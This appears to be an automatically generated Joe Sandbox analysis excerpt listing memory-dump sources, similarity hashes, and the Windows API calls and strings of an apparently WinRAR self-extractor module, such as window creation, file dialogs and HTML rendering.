                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d03be13620e38b50b4348ac48f092bc9a30a88bce5a619f68846d7c519b6b8c
                                                    • Instruction ID: 475e4900815a9505fde966304f8df12a6f1c78e85bbbe5334b05452bb608b41b
                                                    • Opcode Fuzzy Hash: 8d03be13620e38b50b4348ac48f092bc9a30a88bce5a619f68846d7c519b6b8c
                                                    • Instruction Fuzzy Hash: 6D31F371610615ABCB00DF79C8952DDBBE1EB95308F10816EE4A5EB382D27DA989CB84
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
                                                    • Instruction ID: 62ca0eb4193783eb801c3a2f2bf301faeaa12bbf0a015957bd3022d06a4c4e95
                                                    • Opcode Fuzzy Hash: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
                                                    • Instruction Fuzzy Hash: 5E21C672A145716BD7048F65EC9452733A3D7CA32179A5233DF805B3B5D134B922CAE8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
                                                    • Instruction ID: 77424a9f50feaefcaa5df40da88327ffa6b722fbc8496fb74382e688b99152ba
                                                    • Opcode Fuzzy Hash: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
                                                    • Instruction Fuzzy Hash: 81F082B26407059AE720DE58D8467EBBBE8FF20748F20841FD5A6E62C0C2F8D5C1CA49
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy_wcslen_wcsncpy
                                                    • String ID: UNC$\\?\
                                                    • API String ID: 677062453-253988292
                                                    • Opcode ID: 31f036d748028cf8f5463ced1d693ab6ab69f0f18b28585f0506cdb2337a72da
                                                    • Instruction ID: 1662e797052e27df86e1d5e47fcb708ac808cae5bbdf2998b59d7d065d095f7f
                                                    • Opcode Fuzzy Hash: 31f036d748028cf8f5463ced1d693ab6ab69f0f18b28585f0506cdb2337a72da
                                                    • Instruction Fuzzy Hash: 5B419975900318A6CB21BA61CC41BEB33796F05758F18843BF955732C2E77CE9E186AB
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 0041931D
                                                    • _malloc.LIBCMT ref: 0041932A
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    • _wcscpy.LIBCMT ref: 00419343
                                                    • _wcscat.LIBCMT ref: 0041934E
                                                    • _wcscat.LIBCMT ref: 00419359
                                                    • _wcscat.LIBCMT ref: 00419394
                                                    • _wcscat.LIBCMT ref: 004193A5
                                                    • _wcslen.LIBCMT ref: 004193BE
                                                    • GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006), ref: 004193CF
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000), ref: 004193F0
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 00419418
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                    • API String ID: 4158105118-4209811716
                                                    • Opcode ID: b96788d715a7bf62ce6ea7c986b7857ec31a1a2725e05999433294f104e24dd2
                                                    • Instruction ID: f7feff3ea49ef3e1296651f4e63a99f5bfa22b015105f5c5919a5d656c3bb26d
                                                    • Opcode Fuzzy Hash: b96788d715a7bf62ce6ea7c986b7857ec31a1a2725e05999433294f104e24dd2
                                                    • Instruction Fuzzy Hash: 16311832904218BBDB11ABB19C55FEE37689F06324F14415FFC21AB2C2DB7C5D82836A
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000,00000000,?,?), ref: 00419635
                                                      • Part of subcall function 004195B4: LoadCursorW.USER32 ref: 004195EB
                                                      • Part of subcall function 004195B4: RegisterClassExW.USER32 ref: 0041960C
                                                    • GetWindowRect.USER32 ref: 00419656
                                                    • GetParent.USER32 ref: 00419669
                                                    • MapWindowPoints.USER32 ref: 0041966E
                                                    • DestroyWindow.USER32(?), ref: 0041967C
                                                    • GetParent.USER32 ref: 0041969A
                                                    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 004196B9
                                                    • ShowWindow.USER32(?,00000005,?), ref: 004196EB
                                                    • SetWindowTextW.USER32(?,00000000), ref: 004196F5
                                                    • ShowWindow.USER32(00000000,00000005), ref: 0041970B
                                                    • UpdateWindow.USER32(?), ref: 00419714
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 3841971108-1658105358
                                                    • Opcode ID: 9e9ce1ef8281972d43b90b69773ce669ecea7d22ee09c57334953fc587a13e1a
                                                    • Instruction ID: 5f92269131ddc5918b43d9cce9f816c06abde4a4ac5ab7311a7da095659db57d
                                                    • Opcode Fuzzy Hash: 9e9ce1ef8281972d43b90b69773ce669ecea7d22ee09c57334953fc587a13e1a
                                                    • Instruction Fuzzy Hash: 4E31A331600604EFCB319F64DC48EAFBBB9EF44741F10451AF856923A0D735AD91CBA9
                                                    APIs
                                                    • _wcscpy.LIBCMT ref: 0040513E
                                                    • _wcslen.LIBCMT ref: 00405146
                                                    • _wcscpy.LIBCMT ref: 00405156
                                                    • _wcslen.LIBCMT ref: 0040515C
                                                    • _wcscpy.LIBCMT ref: 00405174
                                                    • _wcslen.LIBCMT ref: 0040517A
                                                    • _wcscpy.LIBCMT ref: 00405189
                                                    • _wcslen.LIBCMT ref: 0040518F
                                                    • _memset.LIBCMT ref: 004051A4
                                                    • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051F0
                                                    • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051F8
                                                    • CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 00405200
                                                    • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040521C
                                                    • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405224
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
                                                    • String ID:
                                                    • API String ID: 3496903968-0
                                                    • Opcode ID: 7d35437bc844db6c5139406fd3202ff4015844ff5c57abb798ba1eccdcd4c2cf
                                                    • Instruction ID: 172420e5b3c94e83cba95d00332743140d9e91384160174f30774783fbd1a230
                                                    • Opcode Fuzzy Hash: 7d35437bc844db6c5139406fd3202ff4015844ff5c57abb798ba1eccdcd4c2cf
                                                    • Instruction Fuzzy Hash: B331F571901618ABCB11AFA5DC45BDF7BB8EF04354F50002BFC04B7241DB3899A58FAA
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                    • String ID:
                                                    • API String ID: 3950507155-0
                                                    • Opcode ID: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                    • Instruction ID: d51d06e271f59881509f8fe5658a3f558a6309e2dc6ea558688974f3dc61ade3
                                                    • Opcode Fuzzy Hash: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                    • Instruction Fuzzy Hash: 4D21AF76900218FFCF129FA1CC48DDEBFBAFB49350B104466F914A2120C7369A65EFA4
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D828,0000000C,0041E54F,00000000,00000000,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 0041E426
                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 0041E431
                                                      • Part of subcall function 00421025: Sleep.KERNEL32(000003E8,00000000,?,0041E377,KERNEL32.DLL,?,0041E3C3,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 00421031
                                                      • Part of subcall function 00421025: GetModuleHandleW.KERNEL32(00000000,?,0041E377,KERNEL32.DLL,?,0041E3C3,?,0041FA38,0041A53A,00000456,?,?,0041A53A,00000000,?), ref: 0042103A
                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E45A
                                                    • GetProcAddress.KERNEL32(0041A53A,DecodePointer), ref: 0041E46A
                                                    • __lock.LIBCMT ref: 0041E48C
                                                    • InterlockedIncrement.KERNEL32(?), ref: 0041E499
                                                    • __lock.LIBCMT ref: 0041E4AD
                                                    • ___addlocaleref.LIBCMT ref: 0041E4CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                    • API String ID: 1028249917-2843748187
                                                    • Opcode ID: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                    • Instruction ID: 7af8a4376d65894476f30e00cb8ebc38930f36a8ac0c67b7d335555c403a5827
                                                    • Opcode Fuzzy Hash: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                    • Instruction Fuzzy Hash: BA11C371A00700DFD720AF36A805B8AB7F0AF04714F90452FE8A9962A0CB78A9818F5D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$ChangeNotify_wcschr_wcsncpy
                                                    • String ID: "$.lnk
                                                    • API String ID: 1911921660-4024015082
                                                    • Opcode ID: e651489dc2a5b0bb9b6c615014c869a8b32f12ac8fb9b98e25601d87d8d9f970
                                                    • Instruction ID: 88c4415a075e01d6f651a60111bdb9063bf49f61dcbf6232d0e2daea2c36e0a6
                                                    • Opcode Fuzzy Hash: e651489dc2a5b0bb9b6c615014c869a8b32f12ac8fb9b98e25601d87d8d9f970
                                                    • Instruction Fuzzy Hash: 7191377280022D99DF25DB91CC45EEE737CBF04304F4445ABE609F7191EB789AE48B59
                                                    APIs
                                                    • GetTempPathW.KERNEL32(?,?), ref: 0040EBD0
                                                      • Part of subcall function 00409E72: _wcslen.LIBCMT ref: 00409E78
                                                      • Part of subcall function 00409E72: _wcscat.LIBCMT ref: 00409E97
                                                    • _swprintf.LIBCMT ref: 0040EC0C
                                                      • Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0040EC2E
                                                    • _wcschr.LIBCMT ref: 0040EC61
                                                    • _wcscpy.LIBCMT ref: 0040ECA5
                                                    • _wcscpy.LIBCMT ref: 0040ECCE
                                                    • _wcscpy.LIBCMT ref: 0040ECE1
                                                    • MessageBoxW.USER32 ref: 0040ED11
                                                    • EndDialog.USER32 ref: 0040ED33
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$DialogItemMessagePathTempText__vswprintf_c_l_swprintf_wcscat_wcschr_wcslen
                                                    • String ID: %s%s%d
                                                    • API String ID: 1897388972-1000756122
                                                    • Opcode ID: b6a4a87ef34ec1b45c318ed0c0aca1b65bec44bf2238a5088107fa152e5bf229
                                                    • Instruction ID: 04ed6288bfb4fe1012f448e4c012fb7827b25eb2883d7eaa30f1b490a74f43c8
                                                    • Opcode Fuzzy Hash: b6a4a87ef34ec1b45c318ed0c0aca1b65bec44bf2238a5088107fa152e5bf229
                                                    • Instruction Fuzzy Hash: A95186B180011D9BDB31DFA1DC44BEE77B8BB04308F4445BBE709A3191E7799AA88F59
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00418D61
                                                    • _malloc.LIBCMT ref: 00418D6F
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    • _wcscpy.LIBCMT ref: 00418D8D
                                                    • _wcslen.LIBCMT ref: 00418D93
                                                    • _wcscpy.LIBCMT ref: 00418DDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy_wcslen$AllocateHeap_malloc
                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 2405444336-406990186
                                                    • Opcode ID: 047b849221587149d1c809552d3ca53d6844a505f5caf9e1d03e76e0d3ca8787
                                                    • Instruction ID: 8966a9ceef134e5579ac3cbe6638699c3ba27447775194bb76ca040d1bbf1e8b
                                                    • Opcode Fuzzy Hash: 047b849221587149d1c809552d3ca53d6844a505f5caf9e1d03e76e0d3ca8787
                                                    • Instruction Fuzzy Hash: 6B210672940304ABCB21AB54EC41ADAB3F5DF51324B60401FE840A7290FBBCA9E2839D
                                                    APIs
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040F1CE
                                                    • SendDlgItemMessageW.USER32 ref: 0040F1E3
                                                    • GetDlgItem.USER32(?,00000065), ref: 0040F1F2
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0040F207
                                                    • GetSysColor.USER32 ref: 0040F20B
                                                    • SendMessageW.USER32(?,00000443,00000000,00000000), ref: 0040F21B
                                                    • SetForegroundWindow.USER32(?), ref: 0040F235
                                                    • EndDialog.USER32 ref: 0040F268
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Item$ColorDialogForegroundWindow
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 3794146707-2177901306
                                                    • Opcode ID: 2cb0723f7b33f9d8d75f046d90bb2c95cd2bca76ddac3c5dd686a1da91d84a55
                                                    • Instruction ID: 9a1c6c6675b17edfd38f15777834aa28e592285d7dadef32eb4c47eea7442a16
                                                    • Opcode Fuzzy Hash: 2cb0723f7b33f9d8d75f046d90bb2c95cd2bca76ddac3c5dd686a1da91d84a55
                                                    • Instruction Fuzzy Hash: B821F775200204BBDB316F71DC49E6B3B6DEB85B04F44843AFA01B91E1CA7A8865C72C
                                                    APIs
                                                    • GetWindow.USER32 ref: 0040D8D2
                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0040D90B
                                                      • Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D929
                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0040D940
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0040D94F
                                                      • Part of subcall function 00419991: GetDC.USER32 ref: 0041999D
                                                      • Part of subcall function 00419991: GetDeviceCaps.GDI32 ref: 004199AC
                                                      • Part of subcall function 00419991: ReleaseDC.USER32(00000000,00000000), ref: 004199BA
                                                      • Part of subcall function 0041994E: GetDC.USER32 ref: 0041995A
                                                      • Part of subcall function 0041994E: GetDeviceCaps.GDI32 ref: 00419969
                                                      • Part of subcall function 0041994E: ReleaseDC.USER32(00000000,00000000), ref: 00419977
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040D976
                                                    • DeleteObject.GDI32(00000000), ref: 0040D981
                                                    • GetWindow.USER32 ref: 0040D98A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                    • String ID: STATIC
                                                    • API String ID: 1444658586-1882779555
                                                    • Opcode ID: 37f02244363c2bac29c587b5d647983de08baeacb70688975e51277d0c121b08
                                                    • Instruction ID: 3f053e9a2ee5e0753692044c6e411b0afb2163fc9e2c173e0114d5fe7951901a
                                                    • Opcode Fuzzy Hash: 37f02244363c2bac29c587b5d647983de08baeacb70688975e51277d0c121b08
                                                    • Instruction Fuzzy Hash: B0219272A40204BBDB21AB94CC46FFE7778AB41B44F50403AFD04B61C1CB7C9D469AAD
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
